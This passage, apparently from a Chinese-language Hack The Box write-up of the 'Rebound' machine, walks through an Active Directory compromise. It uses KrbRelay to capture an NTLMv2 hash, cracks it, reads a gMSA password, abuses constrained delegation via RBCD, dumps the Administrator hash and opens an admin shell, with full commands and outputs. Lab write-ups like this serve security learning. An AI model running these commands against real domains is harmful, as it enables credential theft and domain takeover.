*Evil-WinRM* PS C:\Users\winrm_svc\Documents> .\RunasCs.exe x x -l 9 "C:\Users\winrm_svc\Documents\KrbRelay.exe -session 1 -clsid 0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4 -ntlm"

[*] Auth Context: rebound\tbrady
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\winrm_svc\Documents\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAAqpryRm+AzL/k6uK/3ZCn9AogAAFAP///S8mcCLJPf9yIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing cross-session authentication
[*] Using CLSID: 0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4
[*] Spawning in session 1
[*] NTLM1
4e544c4d535350000100000097b218e2070007002c00000004000400280000000a0063450000000f444330315245424f554e44
[*] NTLM2
4e544c4d53535000020000000e000e003800000015c299e21853ef0e432bfe50000000000000000086008600460000000a0063450000000f7200650062006f0075006e00640002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e006800740062000700080041dbca167204db010000000000000000000000005c00410070007000490044005c004b00000000000b000000
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, ReplayDetect, SequenceDetect, UseDceStyle, Connection, AllowNonUserLogons
[*] NTLM3
tbrady::rebound:1853ef0e432bfe50:482b499708d53799e6e59dd60a1a7894:010100000000000041dbca167204db01e648a7f8ca8ef5e60000000002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e006800740062000700080041dbca167204db0106000400060000000800300030000000000000000100000000200000a35c1be83964849fb83b4ee054d903d3e13eab8900e2d37f226c3313a120c7440a00100000000000000000000000000000000000090000000000000000000000
System.UnauthorizedAccessException: Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
   at KrbRelay.IStandardActivator.StandardGetInstanceFromIStorage(COSERVERINFO pServerInfo, Guid& pclsidOverride, IntPtr punkOuter, CLSCTX dwClsCtx, IStorage pstg, Int32 dwCount, MULTI_QI[] pResults)
   at KrbRelay.Program.Main(String[] args)

成功返回了”tbrady”用户的Net-ntlm hash,尝试用john破解

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ john tbrady.hash --wordlist=/usr/share/wordlists/rockyou.txt       
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
543BOMBOMBUNmanda (tbrady)     
1g 0:00:00:04 DONE (2024-09-11 13:44) 0.2398g/s 2923Kp/s 2923Kc/s 2923KC/s 5449977..5435844
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably

可以成功破解,拿到”tbrady”用户的密码”543BOMBOMBUNmanda”

滥用ACL

在bloodhound中分析”tbrady”用户,发现此用户可以读取一个名为”delegator$”的机器账户的密码

借助”bloodyAD”工具利用”tbrady”的凭据读取”delegator$”的ntlm hash;

1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ bloodyAD -d rebound.htb -u tbrady -p 543BOMBOMBUNmanda --host dc01.rebound.htb get object 'delegator$' --attr msDS-ManagedPassword

distinguishedName: CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:f7f7ea94cd22bd4129ca00bab335ceb9
msDS-ManagedPassword.B64ENCODED: ZhCKwN40T+v50IN1lFCkGOApU8008D+oW99yDAjZIaB1sRThOkiMLh2XW/vtZS0+ZJmP41rOCKmZSsMohCCwqJRLFC7jWFtgiFlt4eOJaTMAQcF1JVbhhXdfYf9tgxXGmeNHcjjybJPKmzpN8pc5HB1Ax8rau9Fj4myZUHTGd/+Gx96XeLGHJQ1wOyTcyRHSleSl8NREUiDNtJ5jhfpYO32TyRmXdDPY1a8ny6JsgZGyZgBeOAXnbXWaOBNl7D6FYSbQ8K0+yNjS120QUbZE/p2DASXBGIlYH0C5kLjEfP5Tu0RIOZop2vm1fU58pHfU3spUboWpbVGfx+2hEj0erQ==

constrained Without protocol transition

从bloodhound中并不能看到如何从”delegator$”横向移动的路径,但从机器名字来看,不难猜测,这台机器账户和委派相关;

通过’”findDelegation.py”查看域委派相关信息;一看’”delegator$”对域控实现了约束委派

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ findDelegation.py rebound.htb/oorend:'1GR8t@$$4u' -dc-ip dc01.rebound.htb -k
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[*] Getting machine hostname
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
AccountName  AccountType                          DelegationType  DelegationRightsTo     SPN Exists 
-----------  -----------------------------------  --------------  ---------------------  ----------
delegator$   ms-DS-Group-Managed-Service-Account  Constrained     http/dc01.rebound.htb  No

不可能用经典的”getST”来滥用约束委派,

因为此约束委派设置的是”仅使用Kerberos”,这一点可以通过s4u2self申请的ST是否可转发来判断

为了演示这一点,运行getST.py失败:

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ getST.py -spn http/dc01.rebound.htb -impersonate administrator 'rebound.htb/delegator$' -hashes :f7f7ea94cd22bd4129ca00bab335ceb9
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[-] Kerberos SessionError: KDC_ERR_BADOPTION(KDC cannot accommodate requested option)
[-] Probably SPN is not allowed to delegate by user delegator$ or initial TGT not forwardable

它使用 S4U2Self 为 delegator$ 获取管理员用户的票证,然后尝试使用 S4U2Proxy 转发它,但它失败了(因为ST不可转发);

-self标志告诉getSt.py在 S4U2Self 之后停止,为 delegator$ 获取管理员票证。生成的票证缺少可转发标志:

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ getST.py -spn http/dc01.rebound.htb -impersonate administrator 'rebound.htb/delegator$' -hashes :f7f7ea94cd22bd4129ca00bab335ceb9 -self
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] When doing S4U2self only, argument -spn is ignored
[*] Requesting S4U2self
[*] Saving ticket in administrator@delegator$@REBOUND.HTB.ccache

可以看到”Flags”字段中缺少了”forwardable”标志,说明此ST是不可转发的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ describeTicket.py administrator@delegator\$@REBOUND.HTB.ccache

Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key            : b133b264334cd7f13231a428b4f68ec8
[*] User Name                     : administrator
[*] User Realm                    : rebound.htb
[*] Service Name                  : delegator$
[*] Service Realm                 : REBOUND.HTB
[*] Start Time                    : 11/09/2024 14:04:26 PM
[*] End Time                      : 12/09/2024 00:04:26 AM
[*] RenewTill                     : 12/09/2024 14:02:13 PM
[*] Flags                         : (0xa10000) renewable, pre_authent, enc_pa_rep
[*] KeyType                       : rc4_hmac
[*] Base64(key)                   : sTOyZDNM1/EyMaQotPaOyA==
[*] Kerberoast hash               : $krb5tgs$18$USER$REBOUND.HTB$*delegator$*$72b47c0ffdda4f1189e3a591$17cf8b3c216070235c1ed1a2f89e82d3a11264f7fc2c09a64b170d80a8908d7832d30e50d4467e0c83a7185b6d6be2c0acf9e55b906114af9f4adb11cf92c7cf9990452513b61bc8dcd8431ba8f537ef5aa1208a586bde16aed4c6def820f425dbcd4aeacfc6a4255f228e3ab205f073bce134869658a43e564494e38bd5dc73f01f52af6103196264484bd839cfc552678c0d6c247ea201f9bb3143bcff96e7f926d1dde3cc52e4a3edbc2aa00301748625883be58be7de90f7e012ea526f6d728321421bb7a407f59667308fad2aa27c927736c3205224a59ec73408639c96daf54690ad1ef0167e440f96ef13fca66dcf8de12f83188347df018fd0b74e6e3431ddb3e0979b93b7f98ddb9fbe31d2372beade3aeb4fc923f36ba4bf259f4c71510c414716a59cefd5588c97381ab68551a17d32ba0b3d4b10ebf1e6c5ca134a721d411f4bdc890f97eca5e03b2e9d6be82f133a21ba68ce6f88d84d503fc460ce6f639ba64d3feaee2f09fb71238b6da2e2b9158bc358a4ded351453be6b9f6a4df8f32ed9043d37f9943481eca1f8d9df54e5a44806d6ddc882a67b7d571e7678485289ef351973327037dc7b5c631260d27fc14994a8c4a80c8ab8127a15b8bb053b213dba116267778d52b111c49ab2b12954cfd1ebc07c579059933242d46789b2b4d8e8b1899625f51603211d7ed2e2f2c09ca797b1a335acb5097159bc25a0b5ff297849aabefde4e4b5b5285f48989842f618c25442d84d25c40a13bea29446f2aafedda8180e68cf6ff7a7ed16a0e518c69dfda418aae6bdb59bd59b6dc240e41446252ca499408e2ae49b43505b44db6bd393876bc128a572bd0489b7a5f05848b7903fe6d20620bed7c7a23cc82af781f61729d682f30005ca4dda90f9298f5508ce85ab2bbf71341219cc9873ad0cb1c2ba5c4168174200d4ef4db68e3e5a96d09eb5f4b881f5cb2206cf446577472db46bd07731431a5c243c894972c5d3d64eda29b77df28acaa4caaa841dc35857b2f474ba55401b52afec5ce55b61b5bcb3762b2911f9e14d211b273358698a18cbe9adff7187867b9f9ef4373787fa3659a70e7a28d40b33070d4cb1057fe518063f27604333371710a60c75143148802bd75fecd48d278459d59fd7672e164266248aa471b96f120b6d61861e57642ea5095a63a42a28d0bc96e392481dd251765ddaadfb5a7ac0c0c58071e864085008303a97f1c2552d91609e0e27fbeadf876be41e747df15b6ea6189f3d503ca4760b913dc720603405618ec1fd9f6e5134d5cd90f5900f5a6b4db0b372adfc659655fc906e22ea15bc8533ab608c1badb545c3f518e5b3a18c2a8af9263cb78d9f281f0117b8fb8de5a8be3d3443a0ad55e3dea2e5f090eabf0b54731589afbd28a32207b279fb7cea733c5499a83941ce2239d1914c807f01b7175f8e2c6aa7bdc0952f426bc12596f6abf6d2d6ac39bfdaa6b10c59a5e59d5e97460084735616d6738f657ad52c855ffeb6a9698fd6eeaf64bf7da68f6d81a7977d784c2366cc049cb66b8b523d151add5c82ced9c418afe566dd75b1dfde1f79eaf50949cc8e10ecc5d5949caef2d2edeee978ce7e791721637a403312c5851ce8a50bf7cac1701
[*] Decoding unencrypted data in credential[0]['ticket']:
[*]   Service Name                : delegator$
[*]   Service Realm               : REBOUND.HTB
[*]   Encryption type             : aes256_cts_hmac_sha1_96 (etype 18)
[-] Could not find the correct encryption key! Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18), but no keys/creds were supplied

delegations-constrained文章介绍了如何基于约束委派在无协议转换的情况下通过RBCD(基于资源委派)利用;

我的理解:ldap_monitor是一个服务账户;将”delegator$”机器账户的”msDS-AllowedToActOnBehalfOfOtherIdentity”属性修改为”ldap_monitor”的sid,使得ldap_monitor可以模拟DC01$,拿到DC01$到”delegator$”可转发的ST;获得票证后,可以在 delegator$代表模拟用户(DC01$)发出的 S4U2proxy 请求中使用票据,使用此票据,可以获得delegator$委派DC01$的服务的服务票据,以此达到滥用委派的效果

脚本如下:

1
2
3
4
5
6
7
8
9
10
11
impacket-getTGT rebound.htb/delegator\$  -hashes :f7f7ea94cd22bd4129ca00bab335ceb9 

export KRB5CCNAME=delegator\$.ccache

rbcd.py 'rebound.htb/delegator$' -hashes :f7f7ea94cd22bd4129ca00bab335ceb9 -k -delegate-from ldap_monitor -delegate-to 'delegator$' -action write -dc-ip dc01.rebound.htb -use-ldaps

findDelegation.py 'rebound.htb/delegator$' -dc-ip 10.10.11.231 -k -hashes :f7f7ea94cd22bd4129ca00bab335ceb9

getST.py 'rebound.htb/ldap_monitor:1GR8t@$$4u' -spn browser/dc01.rebound.htb -impersonate DC01$

getST.py rebound.htb/delegator\$ -hashes :f7f7ea94cd22bd4129ca00bab335ceb9 -spn http/dc01.rebound.htb -additional-ticket DC01\$@browser_dc01.rebound.htb@REBOUND.HTB.ccache -impersonate DC01$

运行结果如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ bash acl.sh
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[*] Saving ticket in delegator$.ccache
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[*] Accounts allowed to act on behalf of other identity:
[*]     ldap_monitor   (S-1-5-21-4078382237-1492182817-2568127209-7681)
[*] ldap_monitor can already impersonate users on delegator$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*]     ldap_monitor   (S-1-5-21-4078382237-1492182817-2568127209-7681)
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[*] Getting machine hostname
AccountName   AccountType                          DelegationType              DelegationRightsTo     SPN Exists 
------------  -----------------------------------  --------------------------  ---------------------  ----------
ldap_monitor  Person                               Resource-Based Constrained  delegator$             No         
delegator$    ms-DS-Group-Managed-Service-Account  Constrained                 http/dc01.rebound.htb  No         



Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[*] Impersonating DC01$
[*] Requesting S4U2self
[-] Kerberos SessionError: KRB_AP_ERR_BADMATCH(Ticket and authenticator don't match)
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[*] Impersonating DC01$
[*]     Using additional ticket DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache instead of S4U2Self
[*] Requesting S4U2Proxy
[*] Saving ticket in DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache

最后将票据提供给secretsdump.py,获得Administrator的hash;使用evil-winrm获得一个administrator shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ export KRB5CCNAME=DC01\$@http_dc01.rebound.htb@REBOUND.HTB.ccache
                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ secretsdump.py -k -no-pass dc01.rebound.htb -just-dc-user administrator
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:32fd2c37d71def86d7687c95c62395ffcbeaf13045d1779d6c0b95b056d5adb1
Administrator:aes128-cts-hmac-sha1-96:efc20229b67e032cba60e05a6c21431f
Administrator:des-cbc-md5:ad8ac2a825fe1080
[*] Cleaning up... 
                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ evil-winrm -i dc01 -u administrator -H 176be138594933bb67db3b2572fc91b8
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
rebound\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
dc01